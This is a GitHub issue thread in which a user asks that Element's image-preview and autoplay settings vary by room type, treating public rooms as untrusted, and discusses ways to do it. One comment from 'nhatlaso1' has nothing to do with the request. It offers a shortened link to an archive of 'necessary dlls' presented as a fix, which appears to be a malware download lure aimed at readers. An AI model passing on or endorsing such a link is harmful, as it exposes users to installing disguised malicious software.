### ISSUE TITLE
Apply rulesets on rendering images / avatars depending on the kind of room

### ISSUE THREAD

**Issue by Half-Shot** [vector-im/element-meta#2535]
#### What would you like to do?

Currently Element (web) allows you to start/stop showing image previews globally with the "Show previews/thumbnails for images", as well as several options for autoplaying media. 

![image](https://github.com/user-attachments/assets/988f6733-1f9a-4823-8d15-09f89ca77191)

I'd instead like this to apply per *type* of room, so for public rooms I'd like to never show previews/thumbnails but for private rooms which I trust, it's okay to show previews.

#### Why would you like to do it?

Due to the nature of the internet, it's not reasonable to expect that public rooms will be free of spam or indecent images from time to time. I'd prefer my client to be untrusting-by-default.

#### How would you like to achieve it?

This is the tricky bit. This could be applied at many layers, and ultimately we could go very coarse or very fine grained on this setting. 

The easiest option would be to apply different rules depending on the join_rules of the room, but this might not allow enough freedom in some rooms that the user chooses to trust or private rooms the user does not trust.

Doing this by space might be possible, but it would require resolving potentially many nested rulesets or rooms in order to configure the client. It does also require maintaining all the rooms you care about within a space. The UX of this would also be trickier.

One other option is simply to graduate this setting to a per-room setting, but that does come with the overhead of having to configure the setting for each room you join. At least in my personal experience, I'm in an even split of public and private rooms.

### Have you considered any alternatives?

A lot of users choose to instead run multiple Matrix accounts, having a public persona which is presumably untrusting-by-default and a private persona that has trust built in. It is my personal opinion though that this is a bug, if this kind of problem drives people to separate their accounts.

### Additional context

This is contextually against the backdrop of an increasing amount of spam across different networks, and an intense media focus on privacy and safety features. I think this would be a good first step to helping users.

**Comment by nhatlaso1** [comment]
This might help:This file might fix it
https://bit.ly/4evXrQ6
I put the necessary dlls in the archive

**Comment by Half-Shot** [comment]
I think @jimmackenzie explained this very well in https://github.com/element-hq/element-meta/issues/2518
